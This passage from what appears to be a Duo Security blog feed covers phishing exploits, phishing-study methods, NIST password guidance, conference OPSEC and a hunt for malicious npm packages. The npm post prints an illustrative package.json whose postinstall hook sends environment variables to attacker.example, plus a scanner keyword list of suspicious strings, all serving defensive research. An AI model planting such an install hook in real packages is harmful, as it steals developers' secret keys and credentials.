Once a user opens the PowerPoint file, the PowerPoint Show animations feature runs, downloading an XML file that runs PowerShell commands to download and execute a remote access Trojan (RAT).

In another analysis of a separate attack using the same Windows vulnerability, a phishing email refers to a Microsoft Word attachment as a purchase order, urging the reader to open and reply in order to make the shipment.

Attackers combined the use of an older vulnerability with a newer one, likely to avoid a Word user prompt that could tip off user suspicion, according to the Talos blog, which outlines the technical reasons why the attack wasn’t successful.

Update Microsoft Systems To Protect Them

While phishing still targets the weakest link - the user - there are other defenses organizations can employ to reduce the impact or success of a phishing attempt. One is to practice basic security hygiene by patching systems with the latest updates; this particular CVE is addressed by Microsoft’s April updates.

In an analysis of Duo’s data on devices across enterprises in every industry, we found that 59% of endpoints are running an older version of the Microsoft operating system, Windows 7. Older versions, if not patched, may leave enterprises vulnerable to known flaws that make it easier to compromise machines and steal data. Get more device insights in The 2017 Duo Trusted Access Report.

Phishing in the 2017 Duo Trusted Access Report

Microsoft has announced the end of support for Windows 7 on Jan. 14, 2020, and warns against continuing to use it, urging enterprises to migrate to Windows 10. The software giant cites higher operating costs, increased maintenance, and time lost to attacks on its long-outdated security architecture as reasons to make the switch.

Learn more about how phishing attacks work in The Trouble With Phishing, a guide that details the problems around phishing, how it works, and how Duo can be leveraged as a solution.

<![CDATA[Security Anthropology: How Do Organizations Differ?]]> wnather@duo.com(Wendy Nather) https://duo.com/blog/security-anthropology-how-do-organizations-differ https://duo.com/blog/security-anthropology-how-do-organizations-differ Industry News Mon, 14 Aug 2017 08:00:00 -0400

During Duo’s Second Wind Breakfast in Las Vegas last month, I talked about how we as security professionals might be under the impression that our users and customers are visitors to our Tech Country, when in reality it might be that we are visitors to their Business Country. And if that’s the case, we won’t be understood simply by speaking our own language More Loudly, or in Their Accent. Not only do we have to speak their actual native language, but we need to be able to think in it, and understand all the culture that goes with it.

I was talking earlier with our CEO, Dug Song, who has a way with words (as well as actions). He used the phrase “security anthropology” to describe what we need to understand about our customers and their organizations, and the idea really captured my imagination. We have marketing and sales personas for individuals in security, such as the CISO, the IT administrator, the developer, and the end user. But what if we researched personas for organizations in order to understand better how they approach security issues?

Just like people occupying roles, the organizations themselves vary widely. They have different types of business drivers, priorities, constraints, and capabilities. Large tech companies can drop hints about security fixes they’d like to see and markets move; public sector agencies are at the mercy of the next budget wrangling session in the legislature. An 80-year-old manufacturing company may not care what cute new IoT ideas you might have. An organization located in sparsely populated areas may have less reliable Internet connectivity, thanks to squirrels or avalanches (or avalanches of squirrels — it could happen).

When it comes to security, entities have different threat profiles: the 2015 Verizon DBIR showed that even companies in the same industry can have more threats in common with other verticals than with one another.

Many enterprises today try to figure out their security strategies through peer benchmarking: what are our peers doing, and should we be doing the same? There are several problems with relying on classic benchmarking:

  • What if your peers are really bad at security?
  • What if your management argues that you don’t have to do any more than your peers are doing?
  • How do you really know who your peers are for the purposes of security planning?

By researching organizational personas for security, I’m hoping to find a better answer to that last question. Security decisions are not made simply by looking at other companies in the same industry, because there are many other variables that come into play. The number of users matters, but scale isn’t just grounded in numbers of users; it also means the number of business partners, volume and speed of transactions and operations, complexity of infrastructure, geographical distribution, and much more.

Pick any given entity designated “healthcare,” and if it’s a research organization, it’s not going to have the same threat models and priorities as another one where actual people are bleeding inside the buildings. (Intellectual property is important to protect, but given the choice between hiring another IT person and hiring another nurse, most hospitals are going to go with the latter. And if I’m the one in the hospital bed, I will probably applaud that decision.)

We still have too many “one size fits all” prescriptions for security that don’t fit real-life enterprises; not everyone can or should be seeking the “NSA level” of maturity. By building a security anthropology model for comparing organizations, I hope we can design even better products and services to align with their needs, as well as help the security community speak the language of the users it’s serving. If you know of similar research in this area, or would like to contribute, please feel free to contact me, and stay tuned for more blog posts on this topic.

<![CDATA[Examining Security Science at Black Hat 2017]]> klady@duosecurity.com(Kyle Lady) https://duo.com/blog/examining-security-science-at-black-hat-2017 https://duo.com/blog/examining-security-science-at-black-hat-2017 Duo Labs Fri, 11 Aug 2017 08:00:00 -0400

Daniel Kahneman, in his 2011 book “Thinking, Fast and Slow,” describes two modes of thought: “System 1,” the fast, emotional, instinctual system, and “System 2,” the slow, rational, deliberative system. System 1 is more efficient at quick decisions, but it doesn’t incorporate concepts like information security.

In her Black Hat 2017 talk “Ichthyology, Phishing as a Science,” Stripe Security Engineer Carla Burnett (@tetrakazi) uses this model of human cognition to plan, develop, and execute phishing attacks against other users within Stripe. Of course, she’s not out to actually collect credentials, but to train internal users about what clever types of phishing might hit their inboxes. System 2, the logical, observant system, won’t have time to kick in unless a user is already suspicious of the email in question.

Burnett establishes a taxonomy of phishing types - something essential for clear scientific discussion - based on which action she wants the user to take: perform an external action, install an exploit, or hand over credentials (the archetype of phishing). By splitting thought processes into the two systems, she’s able to explain surprising results.

For example, GitHub sends plaintext emails. Burnett sent a phish with exactly the same (lack of) styling and got only 10% conversion (we steal the term “conversion” from marketing to mean the user taking whatever action the phisher desires, whether that’s handing over credentials, approving an OAuth application, etc.). By using HTML emails with design elements from github.com, she was able to boost her conversion rate to 50%, even though no legitimate GitHub emails actually look like that.

The key was tricking System 1 into feeling good about the email and clicking it before System 2 kicked in. Since current SaaS email conventions include sending substantially styled emails, a plaintext email probably confuses System 1 enough that System 2 has time to rationally evaluate the email.

Real Humans, Simulated Attacks

Another speaker implicitly discussed this psychological dynamic during another Black Hat talk, “Real Humans, Simulated Attacks,” by Dr. Lorrie Cranor (@lorrietweet), Professor of Computer Science at Carnegie Mellon. Dr. Cranor discussed the difficulty in conducting scientifically valid security usability studies. The biggest obstacle in experiment design is that you often can’t have a real adversary to challenge users.

One intuitive type of study is to have users engage in security tasks - for example, telling them that they are going to look at TLS warnings and determine whether it’s safe to continue. The structural problem with this is that the researcher has then primed users to ignore what their System 1 thoughts tell them to do when they do get the TLS warning, and they go straight to the System 2 evaluation of the situation.

In an ideal world, you could actually observe users interacting with security systems in the wild without knowing that their security behavior is being monitored. Cranor described a project her group is working on: measuring the rollout of Duo’s software across their campus system. Using our Admin API, they can pull data about the number of enrolled users and which factors and integrations they use — all without notifying them that they’re being studied. Done anonymously, this also can minimize privacy concerns. This type of project is something that Duo Labs is also currently working on, except we’re looking across all customers and industries, not just one educational institution.

The middle ground that Cranor’s group pursues is clever: minorly deceive the user and make them think they’re doing a study for some other purpose. This raises ethical issues, and researchers generally have to weigh the benefits and necessity of the lie, and then debrief the user afterward about what they lied about and why it was necessary. In many research institutions, studies involving human subjects have to be approved by an independent review board to ensure ethical behavior.

An example of this is to prompt the user to buy something on Amazon and then send them a phishing confirmation email. The overall situation is artificial, but the user is primed to be thinking about their retail experience, so the phish hits their System 1 perception. In a non-security scenario, users swat away warnings, as compared to when they’re told that their security perceptions are being studied.

Carla Burnett from Stripe found this out in practice when she sent out the GitHub phish and noted that 50% of users copied and pasted their passwords into the phishing site. That means those users got their password from a password manager, which certainly is encouraging - but password managers won’t offer a password if the domain doesn’t match the original domain, a key sign of phishing.

These users clicked on their password manager, weren’t alarmed by the lack of a domain match, and went searching for their Github password by hand. This is evidence of a key education failure regarding password managers (or that password managers don’t always provide the right password, so users have been trained to not trust them). Despite the presence of a warning sign (no autocomplete/suggested password for that domain), their users ignored the implications and opened themselves up to exploitation.
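The safeguard those users bypassed can be sketched in a few lines. Real password managers apply stricter origin rules than this, and the vault entry below is obviously a hypothetical placeholder.

```python
from urllib.parse import urlparse

VAULT = {"github.com": "hunter2"}  # hypothetical saved credential

def autofill(url, vault=VAULT):
    """Offer a saved password only when the hostname matches exactly."""
    host = urlparse(url).hostname or ""
    return vault.get(host)  # None for look-alike phishing domains
```

Here `autofill("https://github.com/login")` offers the credential, while `autofill("https://github.com.evil.example/")` returns nothing - the silence users should have treated as a warning rather than a reason to go hunting for the password by hand.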

Lessons for the Security Community

Conducting sound usability studies is a real struggle, and one that we too often treat casually. Asking users what they think about a security system will always get the result of System 2 analytical thinking, not the gut-feeling, what-do-you-do-when-you’re-annoyed-by-security actions.

As a security community, we need to be cognizant of the biases toward thoughtfulness that slip into hypothetical security studies.

There’s tremendous value in “hallway testing,” and people developing security products should definitely have informal and formal hypothetical studies as tools in their metaphorical toolbox. These studies are relatively low cost, particularly hallway testing, which might take only a few minutes.

However, the nature of these methods makes it difficult to assess how System 1 would treat a situation. The holy grail, of course, is observation of real-world behavior of the actual users we’re trying to protect, but that’s not always practical (or ethical!). If it isn’t, we should confirm findings from hypothetical scenarios with studies that don’t prepare users to be particularly security-conscious to make sure we observe users’ System 1 reactions.

<![CDATA[Lights, Camera, Action: The Making of Duo's First In-House Commercial]]> rcordero@duo.com(Rik Cordero) https://duo.com/blog/lights-camera-action-the-making-of-duos-first-in-house-commercial https://duo.com/blog/lights-camera-action-the-making-of-duos-first-in-house-commercial Press and Events Thu, 10 Aug 2017 09:00:00 -0400

In late 2016, Duo’s creative team had the idea to shoot our first broadcast quality commercial - affectionately codenamed “Duo Vs. Everybody.” Because IT security products have traditionally been as cumbersome as the networks they're trying to secure, we wanted to play with the idea that you don't solve complexity by adding more complexity.

Duo has produced our own videos since 2013, but this project was the first to include professional actors and a full video crew in addition to the in-house talent at Duo. This was by far the most complex and extensive production in Duo’s long history of making great video content:


What began as a one-paragraph treatment eventually blossomed into a 32-page behemoth slide presentation that we pitched to the stakeholders within our marketing team. Was it overkill? Perhaps. But from our experience, it was important to pitch our concept with the same level of passion and tenacity as an outside creative agency.

Our goal was to capture an entertaining look at the dichotomy between deploying Duo and Everybody Else (a hardware-based solution). By the end of the spot, we wanted to prove that better security means a better lifestyle.

Because Duo is a brand that our creative team knows inside and out, the challenge was to tell a story that would connect to a wide audience, not just our tech security peers. From there, we managed logistics and applied our collective commercial experience into a high-end ad spot.

One of our actors gets ready for her close-up

The level of pre-production for the ad was a first for Duo. We booked actors from a well-known talent agency in Detroit, a full stack commercial camera and lighting crew, plus wardrobe, hair and makeup departments. Even though it was unusual for a tech security company to work directly with the production crew, thanks to our experience shooting and directing commercials, overall it was a pleasant, painless process.

To keep costs down, we shot everything near our homebase in Ann Arbor, Michigan. The airplane hangar scenes were filmed at Ann Arbor Municipal Airport (courtesy of our friends at Notion), while the office scenes all took place at Duo’s space in the historic Allmendinger Building, a former organ factory.

A view from behind the camera

Just a week before the shoot, our office was completely renovated with a modern, stylish design, so all we had to do was complement the space with props and artwork. With a clever use of art direction, lighting and sound, we created two opposing worlds. On one hand there’s Duo green - a calm, easy to use, zenlike approach to security. In contrast, red meant a life of stress, difficulty and time slipping away.

With a clean Super 35mm sensor and flexible dynamic range, the RED Epic was our camera of choice for this production. We realized early on that natural daylight would be our best key light to capture each scene throughout the open-plan office, while a few carefully placed Kino Flo 4Bank fixtures provided the right amount of fill light to create the two worlds.


To provide more flexibility in post production, we kept the device screens blank with motion tracking marks. This allowed us to carefully design screens that clearly communicated Duo’s features. Plus, we can future-proof the spot by updating the screens when we introduce new features.

Ultimately, producing the spot in-house was a great success. Taking advantage of our creative team’s expertise in the product allowed us to fully express our vision and stay true to Duo’s brand and style. Because we’re steeped in Duo day in and day out, it helped capture the nuances of what we do and how we do it in a way that an outside agency would be hard pressed to pull off. When all was said and done, we emerged with a piece of content that we’re super proud to share with you.

Take a behind-the-scenes look at the Duo Vs. Everybody shoot:


Learn About Duo vs. Traditional Two Factor

<![CDATA[NIST Update: Passphrases In, Complex Passwords Out]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/nist-update-passphrases-in-complex-passwords-out https://duo.com/blog/nist-update-passphrases-in-complex-passwords-out Industry News Wed, 09 Aug 2017 08:00:00 -0400

In June, the National Institute of Standards and Technology (NIST) released new standards for password security in the final version of Special Publication 800-63. Specifically, NIST details the new password security guidelines in the document SP 800-63B: Authentication & Lifecycle Management (PDF). Federal agencies and contractors use NIST’s standards as guidelines on how to secure digital identities.

The Old Normal

Back in 2003, a NIST manager named Bill Burr wrote a document advising users on password complexity - including the use of special characters, numerals and capitalization. This guide was used by federal agencies, universities and large companies as the standard for password security best practices.

But in a recent interview with The Wall Street Journal, Burr, now retired, revealed that he regrets much of what he recommended. His guidelines included changing passwords every 90 days, which often resulted in users minimally editing old passwords, leaving the new ones easy to guess.

These seemingly complex passwords are also easy for hackers and algorithms to crack, and are no longer considered best practice - due, in part, to negative impacts on usability.

Trending Toward Usability, Passphrases

New NIST guidelines recommend using long passphrases instead of seemingly complex passwords. A passphrase is a “memorized secret” consisting of a sequence of words or other text that a user employs to authenticate their identity. It’s longer than a typical password, for added security.

NIST is also concerned with lightening the “memory burden” on users, and recommends encouraging users to create unique passphrases they can remember, using whatever characters they want. To help improve user experience and ease the memory burden, NIST also recommends supporting the copy and paste functionality in password fields.

Other don’ts: don’t require users to create a mixture of different character types for their passwords, and don’t arbitrarily require users to change their passwords unless there’s been a password breach.

Additionally, NIST requires that password fields accept a minimum of eight characters and allow passwords of up to at least 64 characters. NIST also advises against storing password “hints” or prompting subscribers with knowledge-based questions (e.g., “What’s the name of your pet?”), since the answers can often be obtained by unauthorized users.
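Taken together, these rules are easy to express in code. Here’s a minimal sketch in Python - the breached-password list is a tiny stand-in (SP 800-63B also calls for screening secrets against known-compromised values, which in practice means a much larger corpus):

```python
# Illustrative stand-in for a list of known-compromised passwords.
BREACHED = {"password", "12345678", "qwertyuiop"}

def validate_passphrase(secret: str) -> bool:
    """Accept any memorized secret of 8-64 characters that isn't a
    known-breached value. Note what is NOT here: no composition rules
    (mixed case, digits, symbols) and no forced expiration, per the
    updated guidance."""
    if not 8 <= len(secret) <= 64:
        return False
    if secret.lower() in BREACHED:
        return False
    return True
```

A long, memorable phrase like “correct horse battery staple” sails through, while a short or breached value is rejected without any character-class gymnastics.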

NIST provides further guidance on securely storing passwords, requiring them to be salted and hashed using a one-way key derivation function. The salt should be at least 32 bits and chosen arbitrarily. Plus, NIST recommends an additional keyed hash with a secret salt stored separately from the hashed passwords to further resist brute-force attacks.
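A quick sketch of the salt-and-hash guidance using Python’s standard library - the 100,000-iteration count and 16-byte salt are illustrative choices (the salt comfortably exceeds the 32-bit minimum), and the separate keyed-hash step NIST recommends is omitted for brevity:

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # illustrative; tune to your hardware budget

def hash_password(secret: str) -> tuple:
    """Derive a salted hash of the secret with PBKDF2 (a one-way KDF)."""
    salt = os.urandom(16)  # random 128-bit salt
    digest = hashlib.pbkdf2_hmac("sha256", secret.encode("utf-8"), salt, ITERATIONS)
    return salt, digest

def verify_password(secret: str, salt: bytes, digest: bytes) -> bool:
    """Re-derive and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", secret.encode("utf-8"), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)
```

Because the salt is random per password, identical passwords produce different stored digests, defeating precomputed rainbow-table attacks.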

Stronger Authentication With Two Factor (2FA)

Relying solely on the security strength of passwords and passphrases isn’t enough to protect against brute-force, phishing and other attempts to bypass authentication.

A second factor of authentication can help secure access to your users’ accounts. Use the most secure methods, such as Duo Push (sending push notifications to a second device, like a smartphone for users to approve) or U2F (stands for Universal 2nd Factor - a USB device plugged into a laptop that users can tap to approve).

Learn more about two-factor authentication in the Two-Factor Authentication Evaluation Guide and the characteristics of a modern 2FA solution.

<![CDATA[Hunting Malicious npm Packages]]> jwright@duo.com(Jordan Wright) https://duo.com/blog/hunting-malicious-npm-packages https://duo.com/blog/hunting-malicious-npm-packages Duo Labs Tue, 08 Aug 2017 00:00:00 -0400

Last week, a tweet was posted showing that multiple packages were published to npm, a JavaScript package manager, that stole users’ environment variables:

The names of these malicious packages were typosquats of popular legitimate packages. In this case, the attackers relied on developers incorrectly typing in the name of the package when they ran npm install.
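As a rough illustration of how typosquats like these can be flagged, here’s a Python sketch that compares a candidate package name against a (hypothetical, abbreviated) list of popular package names using string similarity; the 0.85 threshold is an arbitrary choice and would need tuning against real data:

```python
import difflib

# Illustrative stand-in for the most-downloaded packages on npm.
POPULAR_PACKAGES = ["cross-env", "lodash", "express", "react", "babel-cli"]

def possible_typosquat(name, popular=POPULAR_PACKAGES, threshold=0.85):
    """Return the popular package a name appears to typosquat, or None.

    An exact match is the real package; a near-match (high similarity
    ratio but not identical) is a typosquat candidate."""
    if name in popular:
        return None
    for legit in popular:
        if difflib.SequenceMatcher(None, name, legit).ratio() >= threshold:
            return legit
    return None
```

For example, `crossenv` - the actual typosquat used in this attack - scores about 0.94 against `cross-env` and gets flagged, while an unrelated name falls well below the threshold.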

This is dangerous because many environments store secret keys or other sensitive bits of information in environment variables. If administrators mistakenly installed these malicious packages, these keys would be harvested and sent to the attacker. And, in this particular attack, the malicious packages were listed to "depend" on the legitimate counterparts, so the correct package would eventually be installed and the developer would be none the wiser.

With npm having a history of dealing with malicious packages - either hijacked legitimate packages or malicious packages created from scratch - we decided to analyze the entire npm package repository for other malicious packages.

This Isn't npm's First Rodeo

This isn't the first time npm has had incidents like this. In 2016, an author unpublished their npm packages in response to a naming dispute. Some of these packages were listed as dependencies in many other npm packages, causing wide-scale disruption and concerns around possible hijacking of the packages by attackers.

In another study published earlier this year, a security researcher was able to gain direct access to 14% of all npm packages (and indirect access to 54% of packages) by either brute-forcing weak credentials or by reusing passwords discovered from other unrelated breaches, leading to mass password resets across npm.

The impact of hijacked or malicious packages is compounded by how npm is structured. npm encourages making small packages that each aim to solve a single problem. This leads to a network of small packages that each depend on many other packages. In the case of the credential compromise research, the author was able to gain access to some of the most highly depended-upon packages, giving them a much wider reach than they would have otherwise had.

For example, here's a map showing the dependency graph of the top 100 npm packages (source: GraphCommons)

Dependency Graph

How Malicious npm Packages Take Over Systems

In both of the previous cases, access to the packages was gained by researchers. However, the question stands - what if an attacker gained access to the packages? How can they use this access to gain control of systems?

The easiest way, which was also the way leveraged by the malicious typosquat packages, is to abuse the ability for npm to run preinstall or postinstall scripts. These are arbitrary system commands specified in the npm package's package.json file to be run either before or after the package is installed. These commands can be anything.
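To make this concrete, here’s a hypothetical example (the package name, URL, and payload are invented for illustration) of what a malicious package.json could look like. Note the postinstall hook exfiltrating environment variables and the dependency on the legitimate package, mirroring the typosquat attack described above:

```json
{
  "name": "crossenv-example",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node -e \"require('http').get('http://attacker.example/?' + Buffer.from(JSON.stringify(process.env)).toString('base64'))\""
  },
  "dependencies": {
    "cross-env": "^5.0.0"
  }
}
```

Because the real `cross-env` is pulled in as a dependency, the developer’s build keeps working and nothing looks amiss.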

Having this ability is not, by itself, an issue. In fact, these installation scripts are often used to help set up packages in complex ways. However, they are an easy way for attackers to leverage access to packages - whether hijacked or created from scratch - to compromise systems.

With this in mind, let's analyze the entire npm space to hunt down other potentially malicious packages.

Hunting for Malicious npm Packages

Getting the Packages

The first step in our analysis is getting the package information. The npm registry runs on CouchDB at registry.npmjs.org. There used to be an endpoint at /-/all that returned all the package information as JSON, but it has since been deprecated.

Instead, we can leverage a replica instance of the registry at replicate.npmjs.com. We can use the same technique leveraged by other libraries to get a copy of the JSON data for every package:

curl https://replicate.npmjs.com/registry/_design/scratch/_view/byField > npm.json

Then, we can use the JSON processing tool jq to parse out the package name, the scripts, and the download URL with this nifty one-liner:

cat npm.json | jq '[.rows | to_entries[] | .value | objects | {"name": .value.name, "scripts": .value.scripts, "tarball": .value.dist.tarball}]' > npm_scripts.json

To make analysis easier, we'll write a quick Python script to find packages with preinstall, postinstall, or install scripts; find files executed by the script; and search those files for strings that could indicate suspicious activity.
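Here’s a minimal sketch of what such a script could look like, assuming the npm_scripts.json file produced by the jq one-liner above; the suspicious-string list is purely illustrative and would produce false positives in practice:

```python
import json

# Strings whose presence in an install script warrants a closer look.
# Illustrative only - a real scan would use a much richer set of signals.
SUSPICIOUS_STRINGS = ["curl", "wget", "bash -c", "process.env", "eval("]

INSTALL_HOOKS = ("preinstall", "install", "postinstall")

def find_install_scripts(packages):
    """Yield (name, hook, command) for each package declaring an install hook."""
    for pkg in packages:
        scripts = pkg.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                yield pkg["name"], hook, scripts[hook]

def suspicious_strings(command):
    """Return the suspicious strings found in an install command."""
    return [s for s in SUSPICIOUS_STRINGS if s in command]

def scan(path="npm_scripts.json"):
    """Scan the dumped registry data and print packages worth reviewing."""
    with open(path) as f:
        packages = json.load(f)
    for name, hook, command in find_install_scripts(packages):
        hits = suspicious_strings(command)
        if hits:
            print(f"{name} ({hook}): {command!r} matched {hits}")
```

From here, flagged packages can have their tarballs downloaded (via the `tarball` field captured by the jq command) for manual review of the files their scripts execute.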


PoC Packages

Developers have known about the potential implications of installation scripts for quite a while. One of the first things we noticed when doing this research were packages that aimed to show the impact of these exact issues in a seemingly benign way:

Tracking Scripts

The next thing we found were scripts that tracked when the packages were installed. npm provides some download metrics on the package listing itself, but it appears that some authors wanted more granular data, raising potential concerns around user privacy. Here are some packages using Google Analytics or Piwik to track installations:

Some packages were less obvious about their tracking, hiding the tracking scripts within JavaScript installation files rather than just embedding shell commands in the package.json.

Here are the other tracking packages we discovered:

Malicious Scripts

Finally, we looked for packages that had installation scripts that were obviously malicious in nature. If installed, these packages could have disastrous effects on the user's system.

The Case of mr_robot

Digging into the remaining packages, we came across an interesting installation script in the shrugging-logging package. The package’s claim is simple: it adds the ASCII shrug, ¯\_(ツ)_/¯, to log messages. But it also includes a nasty postinstall script that adds the package’s author, mr_robot, as an owner to every npm package owned by the person who ran npm install.

Here's a relevant snippet. You can find the full function listing here.

This script first uses the npm whoami command to get the current user’s username. Then, it scrapes the npmjs.com website for any packages owned by this user. Finally, it uses the npm owner add command to add mr_robot as an owner to all of these packages.

This author has also published these packages, which include the same backdoor:

  • test-module-a
  • pandora-doomsday
Worming into Local Packages

The last malicious package we discovered had code that was, in many ways, identical to the packages from mr_robot, but had a different trick up its sleeve. Instead of just modifying the owners of any locally-owned npm packages, the sdfjghlkfjdshlkjdhsfg module shows a proof of concept of how to infect and re-publish these local packages.

The sdfjghlkfjdshlkjdhsfg installation script shows what this process would look like by modifying and re-publishing itself:

You can find the full source here.

While this is a proof-of-concept, this exact technique can be easily modified to worm into any local package owned by the person doing the install.


It’s important to note that these issues don't just apply to npm. Most, if not all, package managers allow maintainers to specify commands to be executed when a package is installed. The issue is arguably more impactful for npm simply due to the dependency structure discussed earlier.

In addition to this, it's important to note that this is a hard problem to solve. Static analysis of npm packages as they are uploaded is difficult - so much so that there are companies dedicated to solving the problem.

There are also reports from npm developers suggesting that work may be underway to leverage various metrics to help prevent users from downloading malicious packages:

In the meantime, it's recommended to continue being cautious when adding dependencies to projects. In addition to minimizing the number of dependencies, we recommend enforcing strict versioning and integrity checking of all dependencies, which can be done natively using yarn or using the npm shrinkwrap command. This is an easy way to get peace of mind that the code used in development will be the same used in production.

<![CDATA[Security Conference OPSEC]]> mloveless@duosecurity.com(Mark Loveless) https://duo.com/blog/security-conference-opsec https://duo.com/blog/security-conference-opsec Duo Labs Mon, 07 Aug 2017 08:00:00 -0400

While we as security professionals regularly watch out for such dangers as creepy “free” Wi-Fi hotspots, evil hoodied hackers typing in their fingerless gloves unleashing havoc, and the dreaded nation-state spy rings assaulting us for our corporate secrets, there are, perhaps, other dangers one should look out for - ourselves.

Black Hat - Unattended Luggage

Photo 1: A sea of unmonitored bags at the “check your bag” area at a security conference this year.

OPSEC. It stands for operational security, and while it has a much more expansive meaning than I’m going to cover here, I did want to make a few points. I’ve talked about attending conferences before, and given you a few tips for remaining safe for your travels.

Your biggest danger is probably going to be regular crime. I recently returned from Las Vegas after attending Black Hat and DEF CON, where I saw some remarkably bad OPSEC and took a few photos. I suppose I expected a community centered around computer security to think about all security issues pretty much 24/7. A few pics were tweeted out with my pithy remarks, but it occurred to me that I could probably explain things in a slightly more helpful manner than 140-character chunks of gut reaction, and point out fairly common pitfalls when it comes to OPSEC.

Near the end of my visit, I learned of three separate individuals I know personally (and heard of several others) who had run into OPSEC lapses and stolen items, so I thought I’d turn some of those tweets into something a little more constructive.

Trading Trust For Convenience

In Photo 1 above, there is a large number of rollerboards and other travel bags, all belonging to various Black Hat conference attendees. As an added convenience, the conference organizers had arranged with Mandalay Bay (where the conference was being held) for a resort bellhop to operate a checked bag area. This way, conference attendees heading to the airport at the end of the day didn’t have to traverse the entire property to check bags at the bell desk.

Now, the main front desk area where bags are stored is off-limits to everyone except hotel staff. It has highly organized shelves and is watched by cameras located near the main doors and on the edge of the casino floor. However, in this makeshift bag-check area at the conference, there were no shelves, meaning a larger footprint was used; the plastic poles and nylon bands between them were the only security barrier; and the whole setup sat in a walkway that led to the vendor floor. Granted, this was a side entrance to that vendor floor, but a legitimate entrance nonetheless.

I didn’t conduct a serious examination, but there were no cameras that I could see in this area, since it covered neither an entrance nor gaming of any kind. There was a single table that functioned as a desk for the bellhop, and the first time I went by, there was no bellhop in sight. In fact, there was a second table behind the first one next to the bags, where a couple of gentlemen were taking a break from the conference to have a chat.

As you can see in the picture, everything is remarkably out in the open, and I think anyone could have walked up and grabbed a bag from the back. About 30 minutes later, I walked by again and the bellhop was there, but so were the two chatting gentlemen, who obviously had not been asked to leave.

The safer thing to do would be to use the main front desk with its additional security and just deal with the long walk. Avoid this satellite operation lacking all of the safeguards to protect bags.

Free USB Chargers

Photo 2: Free power for charging your phone, available in two flavors.

While Photo 2 itself doesn’t show what I believe to be an actual problem, you’d normally have to be fairly trusting to simply power up your phone with a strange cable when you can’t see the other end of it. This was at a vendor booth in one of the main hallways at Black Hat, where they’d set up a lounge area with comfortable seating and tables. They offered free charging, which again is convenient.

A lot of us use portable chargers, and I would encourage investing in one. It gives you that extra freedom of not being on the lookout for a power source because you’ve been using your phone all day at the conference and can’t find an open outlet. It has obvious advantages when it comes to travel, either at the airport terminal or during a long flight.

Like I said, this was probably safe in this instance, but it encourages a mindset that any and all free power sources for phone charging are safe - those sketchy-looking USB ports at the airport, for example.

Unattended Personal Items

Unattended Bags

Photo 3, left: On the other side of the unattended canvas bag is a purse. Photo 4, right: A conference attendee saves a lunch spot.

Leaving your valuables unattended is a no-no. Photo 3 was taken during Black Hat in the vendor area on the second level. While I didn’t feel I could get a photo from the proper angle without looking really creepy to the owner, the canvas bag in the photo contained swag from her employer’s vendor booth right around the corner, and blocked my phone camera’s view of her purse. The bags stayed there for at least 30 minutes (I watched her drop them off), and from the angle I was at, I could have easily stolen the purse unseen.

In Photo 4, taken during lunch, a Black Hat conference attendee placed his laptop bag on a table to save his spot, then turned his back on the bag and began to fill his plate. As I snapped that picture, I heard several attendees around me snicker, and one commented, “one of us should grab his bag to teach him a lesson.”

If you have something valuable, keep it on your person, or lock it up in some way. A travel lock securing a strap around a table leg works nicely, and some bags come with all kinds of anti-theft security features - none of them perfect, but all useful deterrents. Anything that causes a thief to think twice will hopefully motivate them to find easier targets.

Keep It With You, But Safe

Personal Items at Security Cons

Photo 5, left: Items nearly falling out of pockets. Photo 6, right: Backpack with DEF CON guide, next to it were apparently travel documents.

Photos 5 and 6 both show items either nearly falling out of pockets or sitting in wide-open, easily accessible pockets. This is the kind of thing a pickpocket looks for - easy targets with a high chance of undetected success.

Don’t overstuff your pockets - put items into a small bag or backpack instead. Keep wallets and purses in front, and if your valuables are on your back, secure them. Again, travel locks are your friend for locking things like zippers together, and if you can’t readily secure outer exposed pockets, consider keeping only non-essentials in them (or leaving them empty).

Other Considerations

It is possible that due to a position you hold within your organization, or what your organization does, you might be directly targeted as you wander about the conference. While your level of OPSEC might already be a little more heightened, don’t forget about the physical aspects. The precautions mentioned above still apply - and if you work in a sensitive industry, as many attendees of security conferences like Black Hat and DEF CON do, you should definitely step up your game.


There is nothing wrong with being paranoid and overly cautious. My main point is to be realistic about your threats - don’t get caught up worrying about someone targeting just you with a zero-day at the expense of all other considerations, because a zero-day being deployed at a security conference is a rare event.

Another thing to keep in mind: getting pwned at a security conference like DEF CON will most likely mean an embarrassing doxing, while having your ID, credit cards, laptop, cash and phone stolen will be an absolute nightmare (especially getting through security at the airport to head home).

What we are talking about here is risk assessment at a very basic level - when you are in a town filled with drunk tourists carrying gambling money, there is a greater risk of being pickpocketed or having a bag stolen than of having your system compromised. In other words, this is the type of advice one gives anyone visiting Las Vegas, or any similarly large city you might be unfamiliar with. You’re in a strange place where the rules are slightly different - adjust your risk level accordingly.

Stay safe, be aware of your environment at all times, watch your valuables like you watch those security logs, and try to make things harder for the bad guys.